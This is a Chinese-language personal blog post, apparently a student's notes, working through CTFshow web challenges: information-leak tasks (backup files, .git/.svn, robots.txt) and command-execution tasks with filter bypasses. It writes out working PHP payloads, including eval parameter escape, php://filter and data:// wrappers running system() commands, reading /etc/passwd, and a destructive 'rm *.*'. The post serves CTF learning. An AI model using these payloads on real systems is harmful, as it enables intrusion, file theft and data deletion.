<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-center-radar.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"u-l-g-a-n-o-y.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"expandIn","post_header":"slideDownIn","post_body":"expandIn","coll_header":"slideLeftIn","sidebar":"expandIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="记载CTFshow上的web题目(少数能复现 大多都只能看WP&#x2F;视频 来积累思路)">
<meta property="og:type" content="article">
<meta property="og:title" content="web-CTFshow">
<meta property="og:url" content="http://u-l-g-a-n-o-y.github.io/2023/12/04/web-CTFshow/index.html">
<meta property="og:site_name" content="ULGANOY">
<meta property="og:description" content="记载CTFshow上的web题目(少数能复现 大多都只能看WP&#x2F;视频 来积累思路)">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-12-04T13:01:37.000Z">
<meta property="article:modified_time" content="2023-12-05T04:56:30.753Z">
<meta property="article:author" content="U-L-G-A-N-O-Y">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://u-l-g-a-n-o-y.github.io/2023/12/04/web-CTFshow/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>web-CTFshow | ULGANOY</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ULGANOY</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Kitauji Fightooooo!</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://u-l-g-a-n-o-y.github.io/2023/12/04/web-CTFshow/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="U-L-G-A-N-O-Y">
      <meta itemprop="description" content="Laus Deo">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ULGANOY">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          web-CTFshow
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-12-04 21:01:37" itemprop="dateCreated datePublished" datetime="2023-12-04T21:01:37+08:00">2023-12-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-12-05 12:56:30" itemprop="dateModified" datetime="2023-12-05T12:56:30+08:00">2023-12-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF-Web/" itemprop="url" rel="index"><span itemprop="name">CTF-Web</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>6.3k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>12 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>记载CTFshow上的web题目(少数能复现 大多都只能看WP&#x2F;视频 来积累思路)</p>
<span id="more"></span>
<p><strong>感谢@L1Nk8ug师傅借我号 终于可以复现了~</strong><br><a href="https://l-i-n-g-c-e-n-g.github.io/" target="_blank">友链</a></p>
<h1 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h1><p>VIP题目限免呐~</p>
<h2 id="web1-源码泄露"><a href="#web1-源码泄露" class="headerlink" title="web1 源码泄露"></a>web1 源码泄露</h2><p>bp抓包可以直接在response的源码看到flag</p>
<h2 id="web2-前台JS绕过"><a href="#web2-前台JS绕过" class="headerlink" title="web2 前台JS绕过"></a>web2 前台JS绕过</h2><p>az 直接ctrl+u就看到flag了<br>查看源码发现确实就是js前端作了全部return false的处理 但丝毫不影响 禁用js等操作都可以绕过</p>
<h2 id="web3-协议头信息泄露"><a href="#web3-协议头信息泄露" class="headerlink" title="web3 协议头信息泄露"></a>web3 协议头信息泄露</h2><p>bp抓包 然后在response看到Flag:一栏信息即为flag</p>
<h2 id="web4-robots后台泄露"><a href="#web4-robots后台泄露" class="headerlink" title="web4 robots后台泄露"></a>web4 robots后台泄露</h2><p>一些常见的备份文件(仅限于懒得用dirsearch…)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">.index.php.swp</span><br><span class="line">index.php.swp</span><br><span class="line">index.php.bak</span><br><span class="line">.index.php~</span><br><span class="line">index.php.bak_Edietplus</span><br><span class="line">index.php.~</span><br><span class="line">index.php<span class="number">.1</span></span><br><span class="line">index.php</span><br><span class="line">index.php~</span><br><span class="line">index.php.rar</span><br><span class="line">index.php.zip</span><br><span class="line">index.php<span class="number">.7</span>z</span><br><span class="line">index.php.tar.gz</span><br><span class="line">www.zip</span><br><span class="line">www.rar</span><br><span class="line">www.zip</span><br><span class="line">www<span class="number">.7</span>z</span><br><span class="line">www.tar.gz</span><br><span class="line">www.tar</span><br><span class="line">web.zip</span><br><span class="line">web.rar</span><br><span class="line">web.zip</span><br><span class="line">web<span class="number">.7</span>z</span><br><span class="line">web.tar.gz</span><br><span class="line">web.tar</span><br><span class="line">wwwroot.rar</span><br><span class="line">web.rar</span><br><span class="line">robots.txt</span><br><span class="line">index.phps</span><br></pre></td></tr></table></figure>
<p>结合题目提示 访问 &#x2F;robots.txt 得到flag的路径&#x2F;flagishere.txt 访问即可</p>
<h2 id="web5-phps源码泄露"><a href="#web5-phps源码泄露" class="headerlink" title="web5 phps源码泄露"></a>web5 phps源码泄露</h2><p>phps源码 &#x2F;index.phps<br>平时一般猜&#x2F;index.php 这里告诉我们有新的一种.phps<br>访问下载文件 里面即有flag</p>
<h2 id="web6-源码压缩包泄露"><a href="#web6-源码压缩包泄露" class="headerlink" title="web6 源码压缩包泄露"></a>web6 源码压缩包泄露</h2><p>常见的 &#x2F;<a target="_blank" rel="noopener" href="http://www.zip/">www.zip</a><br>下载后得到fl000g.txt<br>猜想这是flag路径 访问 &#x2F;fl000g.txt 得到flag</p>
<h2 id="web7-版本控制泄露源码"><a href="#web7-版本控制泄露源码" class="headerlink" title="web7 版本控制泄露源码"></a>web7 版本控制泄露源码</h2><p>.git泄露(所以平时用git要小心啊!!!)<br>访问 &#x2F;.git 得到flag</p>
<h2 id="web8-版本控制泄露源码2"><a href="#web8-版本控制泄露源码2" class="headerlink" title="web8 版本控制泄露源码2"></a>web8 版本控制泄露源码2</h2><p>又学习到了新姿势<br>.svn泄露<br>访问 &#x2F;.svn 得到flag<br>注: SVN是一个开放源代码的版本控制系统(可实现多人协同开发 &amp; …)</p>
<h2 id="web9-vim临时文件泄露"><a href="#web9-vim临时文件泄露" class="headerlink" title="web9 vim临时文件泄露"></a>web9 vim临时文件泄露</h2><p>index.php.swp 泄露<br>vim中的swp即swap 交换分区 在编辑vim时用来备份缓冲区内容</p>
<h2 id="web10-cookie泄露"><a href="#web10-cookie泄露" class="headerlink" title="web10 cookie泄露"></a>web10 cookie泄露</h2><p>bp抓包 在request中的cookie栏得到flag(只是 ‘{‘和’}’被url编码了)</p>
<h2 id="web11-域名txt记录泄露"><a href="#web11-域名txt记录泄露" class="headerlink" title="web11 域名txt记录泄露"></a>web11 域名txt记录泄露</h2><p>题目提示: 域名其实也可以隐藏信息，比如flag.ctfshow.com就隐藏了一条信息<br>这里学习到利用DNS查询<br><a href="http://www.jsons.cn/nslookup/" target="_blank">在线网站</a>查询即可得到flag</p>
<h2 id="web12-敏感信息公布"><a href="#web12-敏感信息公布" class="headerlink" title="web12 敏感信息公布"></a>web12 敏感信息公布</h2><p>哇 很有趣的题~<br>利用题目提示 在下面heapline找到 372619038 猜测这是密码<br>但是找了半天找不到哪里用得上<br>看提示 说返回 &#x2F;admin ! 学到了 然后以 admin 372619038 登录即可得到flag~</p>
<h2 id="web13-内部技术文档泄露"><a href="#web13-内部技术文档泄露" class="headerlink" title="web13 内部技术文档泄露"></a>web13 内部技术文档泄露</h2><p>这 属实想不到 orz<br>Home最下面会发现document可以点！ 然后就能下载得到pdf…<br>里面<del>贴心的</del>记录了登录路径&#x2F;用户名&#x2F;密码…<br>跟着访问即可得到flag</p>
<h2 id="web14-编辑器配置不当"><a href="#web14-编辑器配置不当" class="headerlink" title="web14 编辑器配置不当"></a>web14 编辑器配置不当</h2><p>az 访问 &#x2F;editor (…)<br>进入里面 找到图片上传 发现可以访问文件空间 能看到网站的所有信息<br>然后在 &#x2F;var&#x2F;www&#x2F;nothinghere下找到flag地址 访问&#x2F;nothinghere&#x2F;flag…txt即可<br>&#x2F;var&#x2F;www下放置的是站点配置 所以用后面地址才能访问</p>
<h2 id="web15-密码逻辑脆弱"><a href="#web15-密码逻辑脆弱" class="headerlink" title="web15 密码逻辑脆弱"></a>web15 密码逻辑脆弱</h2><p>网站最下面泄露邮箱咯 <a href="mailto:&#x31;&#x31;&#x35;&#x36;&#x36;&#51;&#49;&#57;&#x36;&#x31;&#x40;&#x71;&#113;&#46;&#99;&#111;&#x6d;">&#x31;&#x31;&#x35;&#x36;&#x36;&#51;&#49;&#57;&#x36;&#x31;&#x40;&#x71;&#113;&#46;&#99;&#111;&#x6d;</a> (敲响警钟！ 自己网站也要注意！)<br>访问 &#x2F;admin 密码尝试 1156631961发现不对劲 怎么都登不进去<br>又学到骚操作了 忘记密码 密保是城市 那么利用QQ号搜索！！！<br>在西安 就行了 orz<br>密码被重置为 admin7789</p>
<h2 id="web16-探针泄露"><a href="#web16-探针泄露" class="headerlink" title="web16 探针泄露"></a>web16 探针泄露</h2><p>你别说这网站还挺炫的 orz<br>?? 什么是探针??? </p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2222#:~:text=%E7%BD%91%E7%AB%99%E6%8E%A2%E9%92%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%8F%AF,%E5%9C%A8%E5%90%84%E6%96%B0%E5%BB%BA%E7%BD%91%E7%AB%99%E4%B8%8A%E3%80%82">https://xz.aliyun.com/t/2222#:~:text=%E7%BD%91%E7%AB%99%E6%8E%A2%E9%92%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%8F%AF,%E5%9C%A8%E5%90%84%E6%96%B0%E5%BB%BA%E7%BD%91%E7%AB%99%E4%B8%8A%E3%80%82</a></p>
<p>但是这道题 访问 &#x2F;tz.php<br>发现phpinfo()可以点击查看(也符合上面链接的介绍)<br>搜索flag即得</p>
<h2 id="web17-CDN穿透"><a href="#web17-CDN穿透" class="headerlink" title="web17 CDN穿透"></a>web17 CDN穿透</h2><p>透过重重缓存，查找到ctfer.com的真实IP<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/qiudabai/p/9763739.html">https://www.cnblogs.com/qiudabai/p/9763739.html</a><br>这里直接ping即可 (做题归做题 还是要多学点相关知识)<br>但是貌似现在的ip变了… 比如我Ping&#x2F;查询 都得到的是 124.222.110.176 …</p>
<h2 id="web18-js敏感信息泄露"><a href="#web18-js敏感信息泄露" class="headerlink" title="web18 js敏感信息泄露"></a>web18 js敏感信息泄露</h2><p>一个小游戏界面 查看源码 发现score&gt;101会弹出 <code>\u4f60\u8d62\u4e86\uff0c\u53bb\u5e7a\u5e7a\u96f6\u70b9\u76ae\u7231\u5403\u76ae\u770b\u770b</code><br>解码: 你赢了，去幺幺零点皮爱吃皮看看<br>屮 皮爱吃皮是’php’的意思 … (想想也是 通关后肯定弹出一个php界面~)<br>行吧 访问 110.php即可</p>
<h2 id="web19-前端密钥泄露"><a href="#web19-前端密钥泄露" class="headerlink" title="web19 前端密钥泄露"></a>web19 前端密钥泄露</h2><p>一个登录界面 前端源码一看 everthing is here…<br>给了CBC加密的IV KEY 和最后的passwd加密值 直接decrypt即可(写的时候又把参数位置写反了… key MODE iv)<br>passwd : i_want_a_36d_girl</p>
<h2 id="web20-数据库恶意下载"><a href="#web20-数据库恶意下载" class="headerlink" title="web20 数据库恶意下载"></a>web20 数据库恶意下载</h2><p>题目提示 : mdb文件是早期asp+access构架的数据库文件，文件泄露相当于数据库被脱裤了<br>早期的asp+access是.mdb形式 访问 &#x2F;db&#x2F;db.mdb(这db咋想到的啊 orz)<br>下载得到数据库 🔍即可找到flag</p>
<hr>
<hr>
<p>总结: 这些细枝末节的考点有时候真的会成为关键！ 当源码找不到思路 尝试许久无果时 试试找泄露！</p>
<h1 id="爆破"><a href="#爆破" class="headerlink" title="爆破"></a>爆破</h1><p>这部分没环境爆个鬼🤣</p>
<h1 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h1><h2 id="web29"><a href="#web29" class="headerlink" title="web29"></a>web29</h2><p>只过滤了 flag 所以可以用?,* 来匹配<br>视频有个很秀的做法 <code>system(&quot;cp flag.php 1.txt&quot;)</code> 然后直接访问 &#x2F;1.txt !</p>
<h2 id="web30"><a href="#web30" class="headerlink" title="web30"></a>web30</h2><p>过滤了 flag system php<br>用上面的方法</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`cp fla?.??? 1.txt`</span><br></pre></td></tr></table></figure>
<p>然后访问 &#x2F;1.txt</p>
<h2 id="web31"><a href="#web31" class="headerlink" title="web31"></a>web31</h2><p>过滤了 flag system php cat sort shell 点 空格 单引号<br>视频这样执行:  <code>/?c=eval($_GET[1]);&amp;1=phpinfo();</code> 注意phpinfo()结尾分号!<br>这里是参数逃逸(跳板) 学到了 orz<br>这样的话 &amp;1&#x3D;后面就可以传任意值了(脱离了参数c的约束 所以不会被匹配到)<br>这样 <code>cat flag.php</code>需要在源代码中查看<br>而视频又给了一种做法 <code>tac flag.php</code> cat反过来写 就可以直接看到了</p>
<h2 id="web32"><a href="#web32" class="headerlink" title="web32"></a>web32</h2><p>过滤了 flag system php cat sort shell 点 空格 单引号 反引号 分号 括号<br>首先还是可以用上一题的方法 <code>/?c=eval($_GET[1]);&amp;1=phpinfo();</code><br>空格被过滤了可以用url编码(空格 换行 都可以)<br>还有一个点 这里分号被过滤了 可以用 ?&gt;形式  (php最后一条语句不需要分号)<br>视频采用了include<br><code>/?c=include%0a$_GET[1]?&gt;&amp;1=/etc/passwd</code><br>&#x2F;etc&#x2F;passwd 也是一个常见的点 可以得到一些基本信息<br>甚至还可以包括 &#x2F;bin&#x2F;ls 二进制文件 orz<br>接下来的获取flag 视频采用的是文件包含的形式 (因为我们这里用的include 无法直接输出)<br><code>/...?&gt;&amp;1=php://filter/convert.base64-encode/resource=flag.php</code></p>
<h2 id="web33"><a href="#web33" class="headerlink" title="web33"></a>web33</h2><p>过滤了 flag system php cat sort shell 点 空格 单引号 echo 反引号 分号 括号 双引号<br>继续学习新姿势 用require<br><code>/?c=require%0a$_GET[1]?&gt;&amp;1=/etc/passwd</code><br>所以&amp;1&#x3D;后面接伪协议即可读取flag</p>
<h2 id="web34"><a href="#web34" class="headerlink" title="web34"></a>web34</h2><p>过滤了 flag system php cat sort shell 点 空格 单引号 echo 反引号 分号 括号 双引号 冒号<br>多过滤了一个冒号 我寻思上题思路也能继续用吧<br>payload : <code>/?c=include%0a$_GET[1]?&gt;&amp;1=php://filter/convert.base64-encode/resource=flag.php</code></p>
<p>这里视频总结了一下不需要使用括号的情况(语言结构) 常用:</p>
<ul>
<li>echo</li>
<li>print</li>
<li>isset</li>
<li>unset</li>
<li>include</li>
<li>require</li>
</ul>
<p>这也是为什么过滤了括号我们的include仍然可以用(前面用%0a隔开)<br>虽说print也能执行 但是打印出来的不是数据而是flag.php名称…</p>
<h2 id="web35"><a href="#web35" class="headerlink" title="web35"></a>web35</h2><p>过滤了 flag system php cat sort shell 点 空格 单引号 echo 反引号 分号 括号 双引号 冒号 &lt; &#x3D;<br>多过滤了 &lt; &#x3D;<br>az 由于我们用跳板把c的影响去掉了 所以只要在 &amp;1&#x3D; 前面不出现这些就行了 后面还是随意填<br><code>/?c=include%0a$_GET[1]?&gt;&amp;1=php://filter/convert.base64-encode/resource=flag.php</code></p>
<h2 id="web36"><a href="#web36" class="headerlink" title="web36"></a>web36</h2><p>过滤了 flag system php cat sort shell 点 空格 单引号 echo 反引号 分号 括号 双引号 冒号 &lt; &#x3D; &#x2F; [0-9]<br>多过滤了 &#x2F; 和 0~9数字<br>只需要把GET[1]改为GET[a]即可<br><code>/?c=include%0a$_GET[1]?&gt;&amp;1=php://filter/convert.base64-encode/resource=flag.php</code><br>这里视频也说明了为什么我们GET里面的1,a都可以不加引号: php为了向下兼容保留了这种写法(🙇‍)</p>
<h2 id="web37"><a href="#web37" class="headerlink" title="web37"></a>web37</h2><p>另一种形式:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//flag in flag.php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$c</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    </span><br><span class="line">    &#125; </span><br></pre></td></tr></table></figure>
<p>尝试传入 <code>/?c=$_GET[1]?&gt;&amp;1=flag.php</code>发现不能得到flag<br>这是因为这样做只能include flag.php这个字符串 而不能解析flag.php中的数据内容<br>这里视频给了一种用data伪协议的做法<br>data伪协议用法:<br><code>data://text/plain,xxx</code><br>会把xxx字符串作为命令执行<br>比如 <code>data://text/plain,&lt;?php phpinfo(); ?&gt;</code><br>那么我们就可以利用shell中的?匹配来绕过flag的过滤<br>姿势很多 视频又用了cp 😄<br><code>/?c=data://text/plain,&lt;?php system(&quot;mv fla?.php 1.txt&quot;); ?&gt;</code> 这样以后访问 &#x2F;1.txt即可<br>但有个疑问 为什么我第一次mv 操作后后面不管用mv 还是cp都无法继续操作了?<br>再次复现发现确实mv了过后原来的flag.php就没了 再cp就无效了<br>然后发现 <code>rm *.*</code> 能删掉所有😄</p>
<h2 id="web38"><a href="#web38" class="headerlink" title="web38"></a>web38</h2><p>过滤了 flag php file<br>这里过滤了php就不能像上面那样 <?php xxx ?>了<br>看视频说把<?php >改为 <?= >就行了(短标签)
一试还真行 orz
这样就可以用system来执行了
`/?c=data://text/plain,<?= system("tac fla?.???"); ?><code>当然也可以这种方式:</code>&#x2F;?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<?= system("cp fl*.* 22.txt"); ?>&#96;(这么一看*通配符比?好用点 orz)</p>
<hr>
<hr>
<p>所以再看看37,38发现并没有用到第二行的 <code>echo $flag</code> 都是直接利用include+data伪协议直接命令执行了</p>
<h2 id="web39"><a href="#web39" class="headerlink" title="web39"></a>web39</h2><p>又是一种新形式：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//flag in flag.php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$c</span>.<span class="string">&quot;.php&quot;</span>);</span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我的第一思路还是采取data伪协议来命令执行 最后加的.php后缀利用%20截断即可<br><code>/?c=data://text/plain,&lt;?= system(&quot;tac *.*&quot;) ?&gt;%20</code><br>然后看视频好像不截断也不会影响前面的代码执行 只是会加上一行回显 xxx.php罢了(xxx是前面命令执行的返回值)</p>
<h2 id="web40"><a href="#web40" class="headerlink" title="web40"></a>web40</h2><p>过滤了好多 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里剩下了字母 分号 下划线等(其实题目过滤的是中文括号！！！)<br>emmm 完全不会~ 学习一下<br>看hint:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">next</span>(<span class="title function_ invoke__">array_reverse</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">pos</span>(<span class="title function_ invoke__">localeconv</span>()))))); GXYCTF的禁止套娃 通过cookie获得参数进行命令执行</span><br><span class="line"></span><br><span class="line">c=<span class="title function_ invoke__">session_start</span>();<span class="title function_ invoke__">system</span>(<span class="title function_ invoke__">session_id</span>());</span><br><span class="line">passid=ls</span><br></pre></td></tr></table></figure>
<h3 id="solution1"><a href="#solution1" class="headerlink" title="solution1"></a>solution1</h3><p>payload: <code>/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));</code> 可以得到flag<br>或者 <code>/?c=show_source(next(array_reverse(scandir(getcwd()))));</code><br>当然这里也可以把 <code>show_source</code> 改为 <code>echo highlight_file</code> (这时回显是flag后跟了一个1)<br>orz tql 先放这</p>
<ul>
<li>getcwd() 函数返回当前工作目录。它可以代替pos(localeconv())</li>
<li>localeconv()：返回包含本地化数字和货币格式信息的关联数组。这里主要是返回值为数组且第一项为”.”</li>
<li>pos():输出数组第一个元素，不改变指针；</li>
<li>current() 函数返回数组中的当前元素（单元）,默认取第一个值，和pos()一样</li>
<li>scandir() 函数返回指定目录中的文件和目录的数组。这里因为参数为”.”所以遍历当前目录</li>
<li>array_reverse():数组逆置</li>
<li>next():将数组指针指向下一个，这里其实可以省略倒置和改变数组指针，直接利用[2]取出数组也可以</li>
<li>show_source():查看源码</li>
<li>pos() 函数返回数组中的当前元素的值。该函数是current()函数的别名。每个数组中都有一个内部的指针指向它的”当前”元素，初始指向插入到数组中的第一个元素。提示：该函数不会移动数组内部指针。</li>
</ul>
<h3 id="solution2"><a href="#solution2" class="headerlink" title="solution2"></a><del>solution2</del></h3><p>题目提示还给了一种方法<br>先传payload:  <code>/?c=session_start();system(session_id());</code><br>然后找到PHPSESSID 将值修改为 ls(bp抓包修改也行) 就可以执行 system(“ls”)! orz 太秀了吧…<br>但是呢 这样拿不到flag.php的值 这样改了传过后PHPSESSID也变了(但这种也是一个很有趣额思路)</p>
